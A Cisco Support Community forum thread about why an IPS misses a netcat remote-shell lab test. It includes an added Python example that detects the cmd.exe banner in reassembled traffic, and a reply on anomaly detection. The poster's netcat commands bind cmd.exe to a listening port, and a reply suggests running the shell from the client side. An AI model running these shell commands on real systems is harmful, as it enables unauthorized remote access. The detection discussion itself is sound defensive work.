Cisco Support Community
Community Member

IPS will not detect a successful netcat attack

I am doing the following lab testing:

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that? What would be the best way for detecting and firing an alarm for that attack?

Any help is highly appreciated.

5 REPLIES
Community Member

Re: IPS will not detect a successful netcat attack

***

nc -v -l -e cmd.exe -p 565

Attacker:

nc -v .x.x.x.x 565

Gold

Re: IPS will not detect a successful netcat attack

You are using netcat to set up a listener on port 565 and asking it to execute cmd.exe when a client connects. It doesn't actually send "cmd.exe" to the client; it redirects STDIN and STDOUT to the client.

To trigger your signature, set up the listener without a "-e" command. Have the client use "-e cmd.exe" when connecting.
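
Added example, not part of the original post and not a Cisco signature: since the redirected STDIN and STDOUT are what cross the wire, a payload check can look for the banner cmd.exe prints at start-up rather than the string "cmd.exe", in either direction and after joining split segments. The flow tuples, direction labels, function names and sample payloads are constructed for illustration.

```python
import re

# Banner cmd.exe writes to STDOUT on start-up (older and newer Windows wording).
BANNER = re.compile(
    rb"Microsoft Windows[^\r\n]*\[Version [\d.]+\]\r?\n"
    rb"\(c\) (?:Copyright \d{4}-\d{4} )?Microsoft Corp",
    re.IGNORECASE,
)

def reassemble(segments):
    """Join ordered (direction, payload) segments into one byte stream per direction."""
    streams = {"c2s": b"", "s2c": b""}
    for direction, payload in segments:
        streams[direction] += payload
    return streams

def banner_senders(segments):
    """Return the directions whose reassembled stream carries a cmd.exe banner."""
    streams = reassemble(segments)
    return sorted(d for d, data in streams.items() if BANNER.search(data))

# Constructed sample flows (not captured traffic). "s2c" is listener -> connecting client.
LISTENER_RUNS_SHELL = [  # listener started with -e cmd.exe, as in the question
    ("s2c", b"Microsoft Windows XP [Version 5.1.2600]\r\n(C) Copy"),  # banner split here
    ("s2c", b"right 1985-2001 Microsoft Corp.\r\n\r\nC:\\WINDOWS\\system32>"),
    ("c2s", b"dir\r\n"),
]
CLIENT_RUNS_SHELL = [  # client started with -e cmd.exe, as in the reply
    ("c2s", b"Microsoft Windows [Version 10.0.19045.3803]\r\n"
            b"(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\lab>"),
    ("s2c", b"dir\r\n"),
]
PLAIN_CHAT = [("c2s", b"hello\r\n"), ("s2c", b"hi, Windows box here\r\n")]

if __name__ == "__main__":
    for name, flow in [("listener -e", LISTENER_RUNS_SHELL),
                       ("client -e", CLIENT_RUNS_SHELL), ("plain", PLAIN_CHAT)]:
        print(name, banner_senders(flow))
```

The direction that carries the banner flips with the side that launched the shell, so a check bound to one direction sees only one of the two setups.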

Community Member

Re: IPS will not detect a successful netcat attack

Got it! But, as a matter of fact my doubt was:

Can IDS sensors detect netcat activity on the network? Does netcat operate within the RFC TCP standards, and is it therefore seen as normal traffic?

Gold

Re: IPS will not detect a successful netcat attack

Not reliably AFAIK. It's not like telnet or ftp that tend to use specific ports or have application RFCs. With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection). I haven't played with that much yet myself.

Community Member

Re: IPS will not detect a successful netcat attack

Thanks Matt! I'll try to update the sensor and play with that then.
